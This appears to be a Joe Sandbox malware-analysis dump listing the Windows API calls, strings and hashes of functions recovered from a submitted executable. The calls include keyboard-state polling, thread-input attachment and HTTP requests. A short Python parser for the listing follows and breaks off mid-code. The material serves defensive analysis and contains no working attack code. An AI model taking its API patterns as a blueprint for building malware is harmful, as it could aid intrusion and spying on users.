             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
            • String ID: Ping
            • API String ID: 1028309954-2246546115
            • Opcode ID: c83d54e83c96f5dee00b41b81dd945e29bbc021094a107452ef414c3a1631594
            • Instruction ID: 9275acbc0aa69efa29293a7cd45db0c759c88c4400affd16ad12eacf6c9ecaac
            • Opcode Fuzzy Hash: c83d54e83c96f5dee00b41b81dd945e29bbc021094a107452ef414c3a1631594
            • Instruction Fuzzy Hash: 2F91C0759043119FE320CF19C888F1ABBE4BF49318F0485A9F5A99B6A6C735EC45CF81
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharLower
            • String ID: cdecl$none$stdcall$winapi
            • API String ID: 707087890-567219261
            • Opcode ID: 3946c950e7be962e63724f3a28b70e36340b43ef31d14cb6df1781faa2cca653
            • Instruction ID: 686e9065c7e250f9ecb40e331a693d185ad16d71b11b00a66a4467e4ac9b1ab8
            • Opcode Fuzzy Hash: 3946c950e7be962e63724f3a28b70e36340b43ef31d14cb6df1781faa2cca653
            • Instruction Fuzzy Hash: 3E51F436A001369BCF14EF6CC9409BEB7E5BF64324B20826AF9A6E7285D735DD44C790
            APIs
            • CoInitialize.OLE32 ref: 01023774
            • CoUninitialize.OLE32 ref: 0102377F
            • CoCreateInstance.OLE32(?,00000000,00000017,0103FB78,?), ref: 010237D9
            • IIDFromString.OLE32(?,?), ref: 0102384C
            • VariantInit.OLEAUT32(?), ref: 010238E4
            • VariantClear.OLEAUT32(?), ref: 01023936
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
             • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
            • API String ID: 636576611-1287834457
            • Opcode ID: afb38d6e4d114d9312e56b8844057f5955e8f25b9405d9b5e88a1f0ee31514a4
            • Instruction ID: 29b8df8643486592d757ac92295f4d43c8daccdaab94feb8d2a4e20e9dcc5c3d
            • Opcode Fuzzy Hash: afb38d6e4d114d9312e56b8844057f5955e8f25b9405d9b5e88a1f0ee31514a4
            • Instruction Fuzzy Hash: 42617D71608311AFD721DF64C848B6ABBE8BF49714F00485AF9C59F291D7B8E948CB92
            APIs
            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 010133CF
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 010133F0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LoadString$_wcslen
            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
            • API String ID: 4099089115-3080491070
            • Opcode ID: 1a316fa91cad5b5d4d208e4778cfae432df791dc427378b26447f829d823b126
            • Instruction ID: b3a958fbb44f09a42195e2ae083596e5d1a088e456e999f21d96f0f92a5baf74
            • Opcode Fuzzy Hash: 1a316fa91cad5b5d4d208e4778cfae432df791dc427378b26447f829d823b126
            • Instruction Fuzzy Hash: F751C0B1C0020AAADF15EBA1CD42EEEB778BF05340F108065F145B6092EF3A2F58DB60
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharUpper
            • String ID: APPEND$EXISTS$KEYS$REMOVE
            • API String ID: 1256254125-769500911
            • Opcode ID: 724ceebf5820a6e160f08f3a84932d4f87efd1861ee237bdec7be2145cb49366
            • Instruction ID: af91fc22b88be2cb6031a7b554ce1385d72080dfa92767d723dfafc97fd31ade
            • Opcode Fuzzy Hash: 724ceebf5820a6e160f08f3a84932d4f87efd1861ee237bdec7be2145cb49366
            • Instruction Fuzzy Hash: 4C415936A000278BEB625F7DCC905BE7BE5BF54A54F144269E4A1D72C1F73AC981C390
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 010153A0
            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 01015416
            • GetLastError.KERNEL32 ref: 01015420
            • SetErrorMode.KERNEL32(00000000,READY), ref: 010154A7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Error$Mode$DiskFreeLastSpace
            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
            • API String ID: 4194297153-14809454
            • Opcode ID: 90c484080600a23dac117394b4d0f8153a0caccf41478fe8568589cd6b4896c6
            • Instruction ID: ee5c6076ec732aacb96a47bb8f66f4c9b085de4019a64e6426e6afcb23d702aa
            • Opcode Fuzzy Hash: 90c484080600a23dac117394b4d0f8153a0caccf41478fe8568589cd6b4896c6
            • Instruction Fuzzy Hash: FF31B275A402049FD711DF68C884BAABBF8FF86309F048095E585DF29ADB79DD42CB90
            APIs
            • CreateMenu.USER32 ref: 01033C79
            • SetMenu.USER32(?,00000000), ref: 01033C88
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01033D10
            • IsMenu.USER32(?), ref: 01033D24
            • CreatePopupMenu.USER32 ref: 01033D2E
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01033D5B
            • DrawMenuBar.USER32 ref: 01033D63
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$CreateItem$DrawInfoInsertPopup
            • String ID: 0$F
            • API String ID: 161812096-3044882817
            • Opcode ID: 11bf96c9faff1d757c3f1e1cfffc1eda9e29f22a70f71f850e72299977f6712b
            • Instruction ID: 3501ab88b854533a56e70479e7d4d9b9ab9b54714cc0675c69c95ff033c377b8
            • Opcode Fuzzy Hash: 11bf96c9faff1d757c3f1e1cfffc1eda9e29f22a70f71f850e72299977f6712b
            • Instruction Fuzzy Hash: 3D416075A01209AFEB24DF54E984A9A7BF9FF89350F140059F985AB390D735A910CB50
            APIs
            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01033A9D
            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01033AA0
            • GetWindowLongW.USER32(?,000000F0), ref: 01033AC7
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01033AEA
            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01033B62
            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01033BAC
            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01033BC7
            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 01033BE2
            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01033BF6
            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 01033C13
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$LongWindow
            • String ID:
            • API String ID: 312131281-0
            • Opcode ID: bc4153f7671a4c6c9231708ddc8a5a85fc3a9c90810bee34ee06eb805546310e
            • Instruction ID: ad68e2337b2214b37487f7a1a1bde0aa772111cf441123279a1f2e62c9250360
            • Opcode Fuzzy Hash: bc4153f7671a4c6c9231708ddc8a5a85fc3a9c90810bee34ee06eb805546310e
            • Instruction Fuzzy Hash: 88617975A00248AFDB21DFA8CC81EEE77F8FB49700F100199FA95EB291C774A945DB60
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 0100B151
            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B165
            • GetWindowThreadProcessId.USER32(00000000), ref: 0100B16C
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B17B
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100B18D
            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B1A6
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B1B8
            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B1FD
            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B212
            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B21D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
            • String ID:
            • API String ID: 2156557900-0
            • Opcode ID: 7ed6c14509bd1f94c3576fcfa5e89a48cf32d948f890094a83c1a09bedbe45fa
            • Instruction ID: 0a21457b8d1ab09f4319d98645cb076e6c3cde27241b6e9501e3733df8d05308
            • Opcode Fuzzy Hash: 7ed6c14509bd1f94c3576fcfa5e89a48cf32d948f890094a83c1a09bedbe45fa
            • Instruction Fuzzy Hash: 5B31D079900204BFFB379F28D948BAD7BADBB55311F104445FA80EA1C4D7B9A8409FA0
            APIs
            • _free.LIBCMT ref: 00FD2C94
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FD2CA0
            • _free.LIBCMT ref: 00FD2CAB
            • _free.LIBCMT ref: 00FD2CB6
            • _free.LIBCMT ref: 00FD2CC1
            • _free.LIBCMT ref: 00FD2CCC
            • _free.LIBCMT ref: 00FD2CD7
            • _free.LIBCMT ref: 00FD2CE2
            • _free.LIBCMT ref: 00FD2CED
            • _free.LIBCMT ref: 00FD2CFB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 01ebc913f1a2c76ecbaa9c291c0cf171d64e40730370f356ea09dae3c33e3fdd
            • Instruction ID: f8c441fc676015fdb629e6195f89d7ab76cf45b791467ba2b98a153324adb799
            • Opcode Fuzzy Hash: 01ebc913f1a2c76ecbaa9c291c0cf171d64e40730370f356ea09dae3c33e3fdd
            • Instruction Fuzzy Hash: F5119476500108AFCB42EF58DC92CDD3BB6BF15350F4544A6F9485B322D635EA50BB91
            APIs
            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FA1459
            • OleUninitialize.OLE32(?,00000000), ref: 00FA14F8
            • UnregisterHotKey.USER32(?), ref: 00FA16DD
            • DestroyWindow.USER32(?), ref: 00FE24B9
            • FreeLibrary.KERNEL32(?), ref: 00FE251E
            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FE254B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
            • String ID: close all
            • API String ID: 469580280-3243417748
            • Opcode ID: 161bbc7d13d068d2b95a20ca16a994776282a65c5ff519cf25848654552dc7a8
            • Instruction ID: 00cd3a83f4b5905e46713dacb164cd07ad195d03447490f7409a1989f78f70c4
            • Opcode Fuzzy Hash: 161bbc7d13d068d2b95a20ca16a994776282a65c5ff519cf25848654552dc7a8
            • Instruction Fuzzy Hash: 8AD1D671B01212CFDB19EF15C994B69F7A8BF06710F1542AEE44AAB251DB34EC12EF50
            APIs
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01017FAD
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01017FC1
            • GetFileAttributesW.KERNEL32(?), ref: 01017FEB
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 01018005
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018017
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018060
            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 010180B0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CurrentDirectory$AttributesFile
            • String ID: *.*
            • API String ID: 769691225-438819550
            • Opcode ID: c10ab7b9d64adc07829ff150e2e320c9c79a36438232824643e4fd27b7e4ffeb
            • Instruction ID: 19d0b8640a1963a5375f8095a3fbdd59744f60535a8f699f3391c2c637846a26
            • Opcode Fuzzy Hash: c10ab7b9d64adc07829ff150e2e320c9c79a36438232824643e4fd27b7e4ffeb
            • Instruction Fuzzy Hash: 3981C0725042059FDB60EF18C844AAEB7E8BF89310F048C5EF9C5D7255EB39EA45CB92
            APIs
            • SetWindowLongW.USER32(?,000000EB), ref: 00FA5C7A
              • Part of subcall function 00FA5D0A: GetClientRect.USER32(?,?), ref: 00FA5D30
              • Part of subcall function 00FA5D0A: GetWindowRect.USER32(?,?), ref: 00FA5D71
              • Part of subcall function 00FA5D0A: ScreenToClient.USER32(?,?), ref: 00FA5D99
            • GetDC.USER32 ref: 00FE46F5
            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FE4708
            • SelectObject.GDI32(00000000,00000000), ref: 00FE4716
            • SelectObject.GDI32(00000000,00000000), ref: 00FE472B
            • ReleaseDC.USER32(?,00000000), ref: 00FE4733
            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FE47C4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
            • String ID: U
            • API String ID: 4009187628-3372436214
            • Opcode ID: c59264511597fdc09f17e8cf8f05dace0ae48dba172c3689d7413496078aed48
            • Instruction ID: 0a21baa6bba19c64fa6d80a49eedba286104d0b7e33df40bc01a4a73f4956cfa
            • Opcode Fuzzy Hash: c59264511597fdc09f17e8cf8f05dace0ae48dba172c3689d7413496078aed48
            • Instruction Fuzzy Hash: 1B71F131800285DFCF218F65C984ABA7BB5FF4A374F14426DED916A1A9C335A841EF90
            APIs
            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 010135E4
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • LoadStringW.USER32(01072390,?,00000FFF,?), ref: 0101360A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LoadString$_wcslen
            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
            • API String ID: 4099089115-2391861430
            • Opcode ID: 260262979b9bab3f4a43f20edf43f27c6583b35f1ba7e9406647a4daa4b8f45a
            • Instruction ID: 810c130deccb31190530d2b361eeb4ccc2d92ea57ffc5d4da0dafa30afa60ce6
            • Opcode Fuzzy Hash: 260262979b9bab3f4a43f20edf43f27c6583b35f1ba7e9406647a4daa4b8f45a
            • Instruction Fuzzy Hash: CC51A0B1C0021AABDF15EBA0CC42EEEBB79FF05350F044165F14576195EB392A98EFA0
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
              • Part of subcall function 00FB912D: GetCursorPos.USER32(?), ref: 00FB9141
              • Part of subcall function 00FB912D: ScreenToClient.USER32(00000000,?), ref: 00FB915E
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000001), ref: 00FB9183
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000002), ref: 00FB919D
            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 01038B6B
            • ImageList_EndDrag.COMCTL32 ref: 01038B71
            • ReleaseCapture.USER32 ref: 01038B77
            • SetWindowTextW.USER32(?,00000000), ref: 01038C12
            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 01038C25
            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 01038CFF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
            • String ID: @GUI_DRAGFILE$@GUI_DROPID
            • API String ID: 1924731296-2107944366
            • Opcode ID: 4ef4378320ba77c6ddd00e85548cad6d3d3a22fdae2633947182dedbb2a0766c
            • Instruction ID: af52cf4d47e6c085f0a822a7186ee33e15ca4e79c2d0a30d6f8a5e2ef78ffcdc
            • Opcode Fuzzy Hash: 4ef4378320ba77c6ddd00e85548cad6d3d3a22fdae2633947182dedbb2a0766c
            • Instruction Fuzzy Hash: C551ADB1504304AFE714DF24CC55FAA77E8FB89714F00066EF992A72D1CB75A904DB62
            APIs
            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101C272
            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0101C29A
            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0101C2CA
            • GetLastError.KERNEL32 ref: 0101C322
            • SetEvent.KERNEL32(?), ref: 0101C336
            • InternetCloseHandle.WININET(00000000), ref: 0101C341
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
            • String ID:
            • API String ID: 3113390036-3916222277
            • Opcode ID: 2e2779c78e06300e10152cced5316a7235be2dcf2b1408a324001cd1aa4477ca
            • Instruction ID: d347608ed276d2d345561fd3ac75dac4656ad8c980f1f95aad01632cbe822f8f
            • Opcode Fuzzy Hash: 2e2779c78e06300e10152cced5316a7235be2dcf2b1408a324001cd1aa4477ca
            • Instruction Fuzzy Hash: 4D316471540604AFF7729F65CA88AAF7BFCFB49644F04851EF4C6D2204DB39DA048B61
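Each entry above gives, for one recovered function, the APIs it calls with their call-site addresses (`ref:`), the module load base (`Offset: 00FA0000` on the Source File line), the strings it references (`String ID`) and an Instruction Fuzzy Hash. With hundreds of such entries, a small parser makes the listing searchable. The following Python is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses two entries copied from the listing above (the WinInet sequence at 0101C272 and the AttachThreadInput sequence at 0100B151), converts each `ref:` into an RVA relative to the `Offset:` base, and tags functions by module and API name. The tag tables `MODULE_TAGS` and `API_TAGS` are this example's own choices, not categories the report defines.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two entries copied in the shape of the report's
# per-function "APIs" listing (the real report has hundreds).
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0101C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0101C2CA
• GetLastError.KERNEL32 ref: 0101C322
• SetEvent.KERNEL32(?), ref: 0101C336
• InternetCloseHandle.WININET(00000000), ref: 0101C341
Strings
Memory Dump Source
• Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
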